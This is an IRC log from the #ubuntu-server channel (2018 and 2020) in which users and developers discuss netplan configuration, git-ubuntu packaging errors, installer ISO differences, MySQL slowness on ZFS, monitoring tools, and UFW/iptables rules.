<TJ-> the apparmor change was introduced into Debian 5.5.1-3 via commit 9e71a10822
<kstenerud> TJ-: Which repo is that?
<TJ-> I added Ubuntu and Debian git repos to the upstream, as remotes, and tracked the changes from those
<TJ-> 9e71a10822 came in via Debian
<ahasenack> I wonder why the samba apport hook doesn't offer to include /var/log/samba/log*
<ahasenack> usually systemctl status doesn't have enough information
#ubuntu-server 2018-09-07
<groupers> Hi, can someone tell me how to configure a static IP in 18.04? I tried installing nmtui but apparently network manager has been replaced with netplan? I need to create a yaml file now or what?
<RoyK> iirc it should be possible to use /etc/network/interfaces
<RoyK> backwards compatibility
<tomreyn> groupers: ubuntu server uses systemd-networkd rather than network-manager by default. netplan is a management abstraction which can handle both. the goal is to make confioguration easier.
<tomreyn> that's on 18.04
<mybalzitch> oh right I should get back to debugging systemd-networkd not assigning my vlan interfaces ip's
<cryptodan> the Interfaces File was far easier
<RoyK> surprise ;)
<trippeh_> there are too damn many ways to configure networking! *makes one more* ;)
<trippeh_> I know people who really like netplan though, so shrug, wont judge :)
<cryptodan> interfaces was easy as heck the file existed all you had to do was add a few lines and change dhcp to static and bam instant static ip after restarting
<groupers> I guess netplan is fine I just hate learning yet another way
<xrandr_mac> I am looking to permenantly add additional ip addresses to my server. I see that /etc/network/interfaces is no longer used... what is the new way?
<cryptodan> yup continuing to break things or add things where things arent broken
<xrandr_mac> so...thoughts?
<mybalzitch> xrandr_mac: netplan
<mybalzitch> xrandr_mac: or read the interfaces file header and go back to ifupdown
<cryptodan> so just curious if I had 5 interfaces in my PC and 5 different connections I would need a netplan file for each interface?
<mybalzitch> you'd need a single yaml file
<mybalzitch> read the docs
<cryptodan> wow okay
<mybalzitch> it's on the netplan.io site, example configs
<mybalzitch> https://netplan.io/examples
<cryptodan> so much more work then interfaces file
<mwhudson> i lost it with ifupdown when i realised that it was parsing an entirely made up format with a custom c parser
<mwhudson> which is not entirely rational but there you go
<xrandr_mac> mybalzitch, thanks :)
<lordievader> Good morning
<jamespage> coreycb: hey so I finished https://review.openstack.org/#/c/600027 - rewrote the action to fork out to cinder-manage rather than use cinder internals
<ironhalik> Hello
<ironhalik> anyone with some iscsi + mpio experiance?
<ironhalik> I'm trying to create a mpio device from multiple iscsi targets :) For some reason my hw array shows four targets that turn into a single block device. The problem is, in such a setup, mpio doesn't see it as a candidate for a device
<ironhalik> and I'm a relative newbie in storage world, have no idea how it should work or wether its some issue with the storage array configuration
<kstenerud> If I have a conn entry in /etc/ipsec.conf, I should be able to call ipsec up <name> right?
<kstenerud> When I do, it says it can't find it...
<sdeziel> kstenerud: yes, could you pastebin your ipsec.conf file?
<kstenerud> https://pastebin.ubuntu.com/p/PZnnpySk7Z/
<coreycb> jamespage: cool will take a look in a bit
<sdeziel> kstenerud: add "auto=route" to the net-net conn
<sdeziel> kstenerud: there is otherwise an implicit "auto=ignore"
<kstenerud> ok
<powersj> kstenerud, it looks like there has only been one version in cosmic
<powersj> so since you are testing the upgrade path, you could grab the earlier version in bionic and continue using that
<powersj> that would be the simplest way
<dpb1> another strategy is, create a new package with just a changelog change
<kstenerud> so
<kstenerud> apt install -y postfix=3.3.0-1 postfix-mysql=3.3.0-1 mysql
<kstenerud> would work in cosmic as well?
<powersj> no, you would need to grab the deb itself
<powersj> https://packages.ubuntu.com/bionic/amd64/postfix-mysql/download
<powersj> kstenerud, dpb1's suggestion should work to. You could make the change log change and upload to a ppa with an earlier version
<dpb1> or a newer version?
<dpb1> right?
<powersj> oh yeah upgrade
<powersj> doh :)
<kstenerud> hmm so I'd need a ppa1 to demonstrate brokenness, ppa2 with the fix in place, ppa3 to demonstrate that it's fixed?
<powersj> upgrading to ppa2 with the fix in place, won't demonstrate it?
<powersj> only the next upgrade would prevent the issue?
<kstenerud> oh right yeah should only need 2
<kstenerud> so I'd need 2 ppa repos for the tester to verify, one with just a version bump, and one that's an actual fix upping the ubuntu version right?
<powersj> yeah
<kstenerud> ok, and for the strongswan issue, do I just say in the MP that I've been unable to verify the fix?
<kstenerud> er unable to replicate the bug
<powersj> kstenerud, yeah update with your findings, what you tried, and move on
<kstenerud> hmm that's weird... suddenly git-ubuntu is failing on both my machines
<kstenerud> fatal: could not read Username for 'https://git.launchpad.net': terminal prompts disabled
<kstenerud> oh wait no. It's because there's no postfix-mysql?
<kstenerud> ERROR:Unable to find an imported repository for postfix-mysql. Please request an import by e-mailing usd-import-team@lists.launchpad.net
<powersj> smoser, ^ is that something you can help with
<sdeziel> it looks like postfix-mysql is from the postfix package itself
<sdeziel> https://packages.ubuntu.com/source/cosmic/postfix
<smoser> kstenerud: its because you do not have a postfix-mysql in your personal namespace
<smoser> ah. ok.. i can import it. sorry for noise.
<smoser> kstenerud: sorry... even *more* noise.
<smoser> you have to give it a source package name, not a binary.
<smoser> git ubuntu clone postfix
<smoser> that works for me.
<kstenerud> ah ok
<smoser> initially i thoguht you were just worried about:
<smoser>  fatal: could not read Username for 'https://git.launchpad.net': terminal prompts disabled
<smoser> which looks "fatal" , but really is just saying "https://git.launchpad.net/~smoser/ubuntu/+source/postfix does not exist".
<kstenerud> Anybody know what would cause this on a git ubuntu build-source?
<kstenerud> ERROR:Command exited 100: /usr/bin/lxc exec prime-ant -- apt-get install -y devscripts equivs sudo
<kstenerud> ERROR:stderr: E: Package 'equivs' has no installation candidate
<sdeziel> kstenerud: this operation is usually retried
<sdeziel> and here, it succeeds on the second try
<kstenerud> It did about 10 retries or so
<kstenerud> https://pastebin.ubuntu.com/p/rNWpyv5D8m/
<kstenerud> Next try failed in a different way: https://pastebin.ubuntu.com/p/wbFXH9t5ws/
<nacc> kstenerud: let me look
<nacc> kstenerud: what version of ubuntu?
<nacc> kstenerud: and can you do something like: `lxc launch -e cda42780ccea`, `lxc exec <container> -- apt-get update; lxc exec <container> -- apt-get install -y devscript equivs sudo` ?
<kstenerud> cosmic-daily from 20180906
<nacc> kstenerud: to be clear, the first log, it did two sets of 6 retries
<nacc> because it tried two different builds
<nacc> because it failed to build with the orig tarball from pristine-tar
<nacc> g-u doesn't know *why* it failed to build, in that it will fail the same way the second time
<nacc> although that it wasn't the same both times is weird
<bdx> hello all
<kstenerud> hmm interesting. the network isn't running
<bdx> few things I wanted to bring to light as I'm hitting them installing ubuntu server
<kstenerud> there's an ipv6 link but no ipv4
<kstenerud> I'll try a different daily and see if there's a difference
<nacc> kstenerud: yep
<bdx> http://cdimage.ubuntu.com/ubuntu-server/bionic/daily/current/ - the bionic-server-amd64.iso image found here seems far less problematic then what I'm finding here at the releases endpoint http://releases.ubuntu.com/18.04.1/
<bdx> this https://paste.ubuntu.com/p/S5rxQ3xkjx/, is from an ubuntu-18.04.1-desktop-amd64.iso      install from the releases endpoint
<bdx> lol
<bdx> I have been hitting oddity after oddity similar but different to ^
<bdx> ooops shoot
<bdx> s/ubuntu-18.04.1-desktop-amd64.iso/ubuntu-18.04.1-live-server-amd64.iso /   ^^^
<bdx> so, when I install ubuntu-server from http://cdimage.ubuntu.com/ubuntu-server/bionic/daily/current/
<bdx> everything is where I would expect it to be and works as expected (packages found, correct source repos) on first boot
<bdx> I didn't understand what was going on at first, and I still really don't
<bdx> I just have users pegging me with these issues of like, "I installed ubuntu-server from http://releases.ubuntu.com/18.04.1/ and its totally broken"
<bdx> I had to run through it for myself to get a first hand experience and get in touch with you guys
<bdx> either way
<bdx> it seems http://releases.ubuntu.com/18.04.1/ is pushed as the path to get ubuntu-server from
<bdx> this totally sucks because its the one that "seems broken"
<bdx> as opposed to the one found at http://cdimage.ubuntu.com/ubuntu-server/bionic/daily/current/
<bdx> not sure if there is anything you guys can do about this, or if its intended or what
<bdx> just wanted to share the experience from the user perspective
<bdx> sorry to spam your channel, but I thought it was worth bringing up
<bdx> thx thx
<mybalzitch> ubuntu.com/download/server lists 18.04.1 as the version of choice too
<kstenerud> OK, I'm now using a daily from Aug 29th, but that fails in a different way :/
<kstenerud> https://pastebin.ubuntu.com/p/JwHJMhYCVh/
<nacc> bdx: did you read the release notes?
<nacc> kstenerud: can you keep the container and see what the permissions are?
<bdx> nacc: no, I'm sure there is something I've missed here .... I was just expecting there to be consistency between the two
<nacc> bdx: it's a totally different installer
<nacc> bdx: please read the release notes :)
<bdx> nacc: I see that,  thanks
<nacc> bdx: it even points to the alternate installer
<bdx> yeah I know I know
<nacc> bdx: ok :)
<bdx> that shouldn't mean the user experience is totally different following install though
<nacc> bdx: the experience issues, you might want to file bugs about
<bdx> right ... I was hoping this is something you guys might be more on top of .... consistency has been great across different platforms and series previously
<bdx> possibly you shouldn't break that for a new installer
<bdx> nacc: could you link me to where I can file a bug on this please?
<nacc> dpb1: --^ ?
<kstenerud> hmm that's odd
<kstenerud> root@moved-mutt:~# ls -l /tmp/tmptsr1sluv.tar.gz
<kstenerud> -rw------- 1 1001 1001 4673602 Sep  7 18:00 /tmp/tmptsr1sluv.tar.gz
<nacc> bdx: probably subiquity as the source
<nacc> kstenerud: strange
<kstenerud> Tried that an two different versions of cosmic
<nacc> kstenerud: i am about to be eod early; if you want, you can file a bug and i can try and reproduce it on monday. Give me the git repo/branch you are using too
<kstenerud> ok
#ubuntu-server 2018-09-08
<LeMike> Hello there. I want to debug what is taking so long in mysqld. One server is 120 times slower than 2 other server (1 weaker, 1 stronger). So I strace mysql and see some pread but lots of io_getevents and io_submit. Is this normal? How do I find the device or process that causes the problem?
<sarnold> strace is the wrong tool for the job
<sarnold> this is a decent starting point http://www.brendangregg.com/linuxperf.html
<LeMike> Thanks. This is the best help so far :D dtrace or where could I start? I just found out that iotop has a "Netlink error" but the memtester passed.
<LeMike> sarnold: thanks I read this
<sarnold> LeMike: linux's perf tool / or the iovisor collection of tools is your best bet, no dtrace on linux
<sarnold> alright, time to bail, have fun :)
<LeMike> sarnold: thanks. I already like perf a lot :D read a report and liked to investigate even more but somehow the problem is gone. I have a good guess that the hoster finally found a thing on his side and shamefully fixed it silently. I hunt this shit since yesterday.
<RoyK> LeMike: try slow query log
<RoyK> LeMike: and make sure you install sysstat first so you can monitor the system while running the query
<RoyK> LeMike: to see what's slowing things down - usually cpu or i/o
<LeMike> RoyK: Slow query log just shows the query and how long it took. With that I came to the conclusion to look into mySQL and IO. Thanks
<LeMike> I continue some other day because after a limit of 4 hours I have to stop investigating (as the customer does not want to pay more xD )
<_KaszpiR_> LeMike what's the specs of the servers, and any noticeable mysql setting set?
<_KaszpiR_> if they fixed it silently then I suspect that if this is on virtual platform then memory baloon driver/high cpu steal/horrid disk io perf (cause array rebuilds etc)
<RoyK> LeMike: you should see where the load is high easily with sar
<LeMike> RoyK: I dont get it. This seems more like recording a timespan than a single process. And what if some buffer is full or some process is just waiting for stupid reasons?
<RoyK> it's recording a timespan, yes
<RoyK> but then again, using things like top or htop can tell you where the problem lies
<RoyK> iotop perhaps too
<RoyK> if you have a truckload of different services on the same server, all competing, you should be virtualising more
<RoyK> if the machine is dedicated to mysql, it should be trivial to find the bottleneck
<blackflow> if I may interject for a moment.... how would virt help here. if anything it'd just slow things down with extra overhead.
<blackflow> LeMike: you can check for two things, iowait and disk latency
<RoyK> blackflow: it'll slow things down a few percent, but it'll definetely make it easier to monitor
<RoyK> blackflow: throw a ton of services on the same machine and "something" is slow, well, then everything's slow
<blackflow> pretty sure it'd be the same thing under a VM. the host kernel has to juggle processes and serialize IO in both cases
<blackflow> but I agree about monitoring, somewhat. should be possible with cgroups to some extent too.
<RoyK> if vitualised, monitoring on the guest will show you the bottleneck
<LeMike> blackflow: I let it run with "iostat -d 1" and got somewhat like 2348 kB write every few seconds. iowait is 0,85% but I guess I need to reboot. dunno how to check latency
<blackflow> LeMike: https://www.kernel.org/doc/Documentation/block/stat.txt
<blackflow> read ticks / read I/Os = average wait (latency) for read
<blackflow> same for write.
<LeMike> uh. can I truncate this file while the server runs? :) this would be nice
<RoyK> LeMike: how much memory? what is the iops count? what sort of storage does it have?
<RoyK> what about cpu load?
<RoyK> swap usage?
<RoyK> sar will give you paging statistics
<RoyK> have you tuned mysql/mariadb in any way?
<RoyK> how large is the database's dataset?
<blackflow> what about the db itself... effective indexes? does it access tuples sequentially or indexed?
<RoyK> lots and lots of questions ;)
<blackflow> indeedy.
<RoyK> mysql allows you to run "explain <query>" to see if indices are used or not
<RoyK> quite useful thing
<blackflow> LeMike: I'd recommend you activate some graph baesed monitoring on that server. A picture is worth a thousand eyes, and problems are easier to spot. I use Munin for that, infact, that's how I know about that latency measure. It's from Munin's diskstats plugin.
<blackflow> *a thousand words   (lol)
<blackflow> I'm listening to TechSnap podcast and they're talking about "many eyes in open source security", so the fingers typed that :)
<LeMike> 4G ram (more than 3G free also in swap free), cpu idles, iotop does not work :/ the table is 276M
<LeMike> not touched mysql config (once for more cache etc but reset it already)
<blackflow> 276M is a lot, esp if the DB has to sift through the rows sequentially because it's badly indexed. a single select can take seconds....
<blackflow> (I'm assuming you meant bytes, because 270M rows would be gigabytes most likely...)
<RoyK> and then - mysql doesn't scale too well
 * RoyK only uses mysql at gunpoint
<blackflow> yeah I don't know much about MySQL. PostgreSQL is my poison and I monitor all that with Munin - tuple counts, sequential vs indexed access, average query time, size, stuff...
<blackflow> DB monitoring and statistics is a life saver.
<RoyK> I'd choose postgres over mysql any day
<blackflow> aye!
<LeMike> (megabytes) Same DB and query on my laptop takes 1-2 seconds. server needs more than 60 seconds
<RoyK> but then - some systems like wordpress don't work too well on postgres because those wp guys haven't understood a damn thing about abstraction
<RoyK> LeMike: what sort of storage?
<LeMike> I look up some monitoring and gather statistics. To bad I got perf.data here and was hoping to just read through and see the big time waster
<blackflow> if MySQL is anything liek postgres,   EXPLAIN ANALYZE <query> is a treasure trove of data bout the performance of that query. number of iterations, indexes used, loops, hashes, everything.
<LeMike> RoyK: You mean InnoDB? Or filesystem?
<RoyK> disk
<blackflow> RoyK: I was so pleasantly suprised when I installed GitLab and saw it developed specifically for Postgres (and recommending Postgres over the dolphin). So rare to see something written for Postgres.  Ohh ohh, and roundcube.
<LeMike> RoyK: zfs
<RoyK> LeMike: what sort of disks?
<blackflow> oh wait, that changes things a bit. did you tune it for mysql?
<blackflow> LeMike: iirc MySQL recordsize is recommended to be 16k. Postgres 8k. Now, depending on your use case and workload, that might mean a lot, or nothing at all (eg. my use case allows larger record size -- with postgres -- which benefits compressratio)
<LeMike> RoyK: HDD. if that isn the answer then help pls
<RoyK> LeMike: what sort of hdd and how many of them?
<RoyK> LeMike: there's no straight answer here, but as blackflow says, the zfs blocksize for that dataset may be important
<RoyK> LeMike: http://open-zfs.org/wiki/Performance_tuning#MySQL
<LeMike> cant access shit with lshw. just one HDD. Got 50GB out of 3TB for this machine it seems.
<LeMike> oh. 2x TOSHIBA DT01ACA3 in /proc/scsi/scsi. A raid? I dont see the block size. fdisk does not work and I dunno how
<_KaszpiR_> zfs on one disk?
<_KaszpiR_> show us  'lsblk'  output
<RoyK> LeMike: zfs get
<tomreyn> OS + zfs + mysql on 4GB RAM just sounds wrong.
<tomreyn> unless its a *very* light-weight DB workload you'll want more RAM.
<tomreyn> disks dont matter for a database server unless you designed it wrong, provided too little RAM / didn't tune it for the RAM it has available.
<RoyK> zfs isn't that heavy on memory - that's a myth - that is - unless you turn on dedup
<RoyK> but then, that's praying to all known gods for trouble
<LeMike> _KaszpiR_: got it here https://pastebin.com/p3BsHefU
<RoyK> LeMike: pastebin output of "zpool status", "zfs list" and "zfs get all", please
<LeMike> RoyK: no pool, no dataset, zfs get all has no output (I am in PVE it seems, I am not the hoster or have access to the host)
<RoyK> then you're not running zfs
<LeMike> df -Th said so
<RoyK> pastebin that
<RoyK> keep in mind you need "sudo" in front of those zfs/zpool commands
<LeMike> I am groot!
<LeMike> https://pastebin.com/tqEXHQs7
<RoyK> that doesn't make sense
<LeMike> Either way this feels like a direction that is not really giving me an answer what specific device or thingy is taking so long . Like "the buffer is too low" or "sync takes too long" or "Raid is broken" etc.
<tomreyn> it's probably a container and ZFS is managed outside of it
<LeMike> Okay. This is reaching 1k â¬ almost. I give up, tell the customer and let him kick the hoster in his nuts. I think that my app has nothin to do with being so slow :P
<tomreyn> did you run mysqltuner?
<tomreyn> doing so (or knowing what needs to be done OTOH) is the minimum i'd expect from a contractor in charge of managing a DB
<LeMike> thanks, those tests are all okay. and I go to sleep now. This took the whole day and I am totally not a SysOp, just a simple dev. But I learned things. Thanks a lot! :)
<_KaszpiR_> 1k EUR and answer is 'this is a vm provider issue, lol'
<blackflow> RoyK: fwiw, zfs/zpool commands no longer need sudo for read only tasks  (eg list, status, get, ...)
<RoyK> blackflow: possibly
<blackflow> no longer = as of 0.7.x and Bionic
<_KaszpiR_> LeMike I suggest installing some monitoring tools (newrelic is the easiest but free tier limits view stats for 24h afair)
<RoyK> still, zfs list should show the dataset(s) and zpool list should show the pools etc
<RoyK> if they don't, something is messed up
<_KaszpiR_> zpool list without sudo will return permission denied
<RoyK> LeMike: have you upgraded something lately?
<blackflow> _KaszpiR_: not on Bionic
<RoyK> zfs can be a bit touchy in that respect
<blackflow> also... newrelic? why on earth.... there's plenty of nice, FOSS-y and not SaaS monitoring things. Munin, Nagios, Cacti, ...
<_KaszpiR_> I know, but that was just an idea of getting thing super fast and easy without the whole mess required to set up other tools
<_KaszpiR_> munin would be quite fast, though
<blackflow> yeah. Munin is great, thats what I use.
<RoyK> nagios went out of style some years back ;)
<blackflow> heh
<blackflow> what is the monitoring tool of the year now, Zabbix?
<RoyK> I use zabbix
<_KaszpiR_> but most of those paid projects hav eone advantage - you get a shitload of integrated monitoring stuff from the box, without much extra configs
<RoyK> and munin
<RoyK> why not both
<_KaszpiR_> collectd + graphite + grafana / munin (wanna migrate from munin, though)
<RoyK> munin is very nice to start with
<_KaszpiR_> it works very well for say... 15 hosts
<_KaszpiR_> but thend to be lacking if you need to aggregate stuff
<RoyK> works fine with a hundred machines too, but it doesn't scale too well above that
<RoyK> munin is old and rather simple
<RoyK> but very easy to setup
<_KaszpiR_> and about zabbix, I'm not a fan of it (but used only 2.x AFAIR and nothign else, and it was pretty nightmare)
<RoyK> _KaszpiR_: we're at 3.4 now - quite a bit has hppened since v2 ;)
<_KaszpiR_> I remember that the logic behind zabbix was pretty 'wtf' and it required A LOT of extra customization to get any app working, which was major pain
<RoyK> it still seems russian
<RoyK> but you get used to ut ;)
<RoyK> s/ut/it/
<_KaszpiR_> something like 'send any metric to server' was just impossible, because it had to exist on zabbix or it was dropped
<_KaszpiR_> graphite as it's own issues but I've found it easier to manage with those
<RoyK> but then - what else is there to choose?
<RoyK> graphite only draws graphs
<RoyK> it doesn't have alerts and triggers etc
<_KaszpiR_> yeah
<_KaszpiR_> still you can query those and have different alerting system
<_KaszpiR_> grafana has alerting now
<_KaszpiR_> from other solutiuons - prometheus is pretty decent
<RoyK> we chose zabbix at work - some 350 servers, 60/40 linux/windows
#ubuntu-server 2018-09-09
<sarnold> LeMike: hah, figures :) still, now you know a new tool :D not all bad
<xrandr_mac> Hi.. I am trying to find some documentation on UFW as I am a little new to it. I am trying to understand what this line means: -A ufw-http-logdrop -m limit --limit 5/min --limit-burst 10 -j LOG --log-prefix "[UFW HTTP DROP] "
<xrandr_mac> Specifically what the --limit and --limit-burst does. I understand --limit is limiting something, but the 5/min... what is that doing along with the limit burst?
<tomreyn> xrandr_mac: this is for rate limiting by ip address. see iptables-extensions(8) and search for: ^   limit
<xrandr_mac> Ok thanks
<xrandr_mac> That cleared it up
 * xrandr_mac offers tomreyn a beer for his troubles :)
<tomreyn> no troubles here ;) thanks, though
<xrandr_mac> Was wondering why I kept being locked out of my website lol
<JanC> xrandr_mac: it's intended to be used with things like SSH or VPNs
<xrandr_mac> JanC, wanted to prevent DDOS attacks
<JanC> you can probably do that with a custom iptables rule similar to the one created by UFW, but less trigger-happy  :)
<RoyK> or use nftables if you're on the cutting edge ;)
<JanC> isn't nftables replaced yet?   ;)
<JanC> s/replaced/superseded/
<RoyK> no
<RoyK> ifw was superseeded by ipchanges, which was superseeded by iptables, which as superseeded by nftables
<RoyK> s/ifw/ipfw/
<RoyK> and not ipchanges, ipchains
<RoyK> interesting how my fingers just write on automatically
<xrandr_mac> lol
<xrandr_mac> I think for now I am going to just disable that rule...
<JanC> RoyK: there is now also something called bpfilter which is based on eBPF, but it's still a WiP   :)
<RoyK> oh - didn't know that
<RoyK> JanC: seems rather cutting edge - probably take a wee while to stabilise
<JanC> :)
<havenstance> anyone have any idea why a Standard Lamp stack containing MySQL instead of MariaDB on Ubuntu Server 18.01.1 LTS would be lagging when trying to view the page?
<havenstance> nvm google-fu found the answer, I'll be migrating this to MariaDB
<trippeh_> RoyK: very cutting edge indeed - I dont think they have any actual functionality yet.
<trippeh_> basically an experiment at this stage.
<trippeh_> also nftables might move over to the same infra IIRC. today nftables uses something similar to but not BPF
<RoyK> trippeh_: I don't know BPF, but I read nftables uses a miniature vm with a micro-OS
<RoyK> not even an OS, really
<RoyK> separate instruction set etc
<trippeh_> yes, like BPF.
<RoyK> perhaps nftables will disappear like upstart, thenâ¦
<trippeh_> or just become another frontend
<RoyK> BPF certainly looks promising, though
<RoyK> https://cilium.io/blog/2018/04/17/why-is-the-kernel-community-replacing-iptables/ The most recent development in the evolution of BPF is an exciting proposal to completely replace the kernel part of iptables with BPF in a way that is completely transparent to the user, i.e. existing iptables client binaries and libraries will continue to work.
<RoyK> I've never worked with systems large enough to hit the bottleneck of iptables, though
<RoyK> but then - I don't have 20k Kubernetes services
<trippeh_> I've experimented a bit with BPF - but not the bpfilter, as that is still not very useful
<trippeh_> XDP is fun
<trippeh_> the tracing stuff too
<RoyK> so - perhaps nftables is just a pit stop?
<RoyK> I don't really see the difference - I don't know the stuff under the hood
<RoyK> between nftables and bpfilter, that is
<trippeh_> I'd expect nftables to just become another frontend to bpfilter, with nicer syntax than iptables.
<trippeh_> if bpfilter pans out that is. that we do not know.
<RoyK> but what about nftables? it too uses a completely different backend than iptables
<trippeh_> althouth nftables have shown the bytecode approach to be viable.
<RoyK> BPF - is that how freebsd has been doing firewalling the latest years, hence the "berkley" name?
<trippeh_> nftables would be changed to emit BPF. like iptables would be
<trippeh_> BPF var originally a filter for sockets, for tcpdump and the like. not really a firewall thing.
<trippeh_> the BPF in linux is significantly extended
<RoyK> just wondered - uio.no built this service for sensitive data some years back, mainly for universities and colleges, but also others, in norway, and I know they used freebsd for the firewall, at least 5 years back
<RoyK> the rest is mostly linux
<trippeh_> you're thinking about pf probably
<RoyK> possibly
<RoyK> I just never saw the big deal with pf compared to iptables
<trippeh_> pf has nothing to do with BPF
<RoyK> ok
<RoyK> btw, any idea why some would prefer pf to iptables?
<trippeh_> many hate the iptables syntax. I dont mind it either
<RoyK> I'm quite used to iptables
<RoyK> works
<RoyK> that obviously doesn't mean it's optimal
#ubuntu-server 2020-08-31
<icey> hey jamespage - coreycb asked me to check in with you regarding my stable/queens changes to nova (https://code.launchpad.net/~chris.macnaughton/ubuntu/+source/nova/+git/nova) - specifically regarding fix-overcommit-for-NUMA-based-instances.patch
<ld50> hi!
<ld50> would fsck.mode=skip on the kernel commandline also stop the installer from checking the md5sums.txt checksums? i'm experimenting with autoinstall using the server iso, so i'm doing a lot of installing.
<ld50> it seems i can't skip the md5sum check with ctrl-c, sitting through that on every try gets a bit tedious
<mwhudson> ld50: there is a flag for that i think
<mwhudson> hm maybe not actually
<mwhudson> ld50: hmm fsck.mode=skip should be skipping it
<ld50> mwhudson: will try!
<ld50> mwhudson: it worked, many thanks :)
#ubuntu-server 2020-09-01
<JaySee> Hi, can anyone help in configuring multiple NIC on ubuntu 18.04 with netplan. I am not able to connect to server using all NIC except where gateway is configured. My config --> https://paste.ubuntu.com/p/x4JQWynPQ7/
<RoyK> JaySee: looks ok - what are eth[123] connected to?
<RoyK> JaySee: not directly related, but why don't you choose something like 10.2.[22,23,24,25].x instead of changing both the second and the third octet?
<JaySee> @RoyK: eth0 and eth1 are connected one switch and eth2 and eth3 are connected to another switch (both are dell). All these switches are connected in spine leaf topology. second octet represents the eth port and third octet represents the leaf (switch) to which the node (server) is connected. This is existing topology, just wanted to follow the same.
<RoyK> JaySee: do you mean eth0 and eth1 are on the same subnet/VLAN?
<JaySee> @Royk: they are in different subnet , but they are on same switch
<RoyK> JaySee: different VLANs?
<JaySee> yes
<RoyK> so what is it that doesn't work?
<JaySee> I can not connect to server using SSH on eth1/eth2/eth3
<JaySee> If i change the gateway from eth0 and configure gateway of the eth1 or eth2 ... I can connect, but I am not able to use all the eth ports to connect to the server
<RoyK> can you ping the server from a host on the other networks?
<JaySee> No. I am not able to ping as well.
<icey> hey jamespage - coreycb asked me to check in with you regarding my stable/queens changes to nova (https://code.launchpad.net/~chris.macnaughton/ubuntu/+source/nova/+git/nova) - specifically regarding fix-overcommit-for-NUMA-based-instances.patch
<icey> specifically, the idea that the upstream change to queens got a -1: https://review.opendev.org/#/c/726868/
<johnallen-amd> I've got a guy here at AMD who's running into a failure when installing 20.04 server over PXE. Could just be a problem with our PXE server, but we don't have enough information yet. Can anyone provide some guidance on gathering logs in the event of a failed installation?
<powersj> johnallen-amd, https://ubuntu.com/server/docs/install/reporting-problems
<powersj> that should get you a few things to start looking to provide
<johnallen-amd> Thanks, powersj. I'll start there.
<elge> meow there.  any idea why netplan wouldnt work?  I have a clean configuration, I have netplan.io package installed, it points to renderer networkd, and I do netplan generate and apply w/o success.  any idea?
<elge> Oops, I had the wrong extension in /etc/netplan/, config should end with .yaml not .cfg, sorry.
<sarnold> elge: woot, thanks for reporting back :)
<teward> elge: glad that was a simple fix
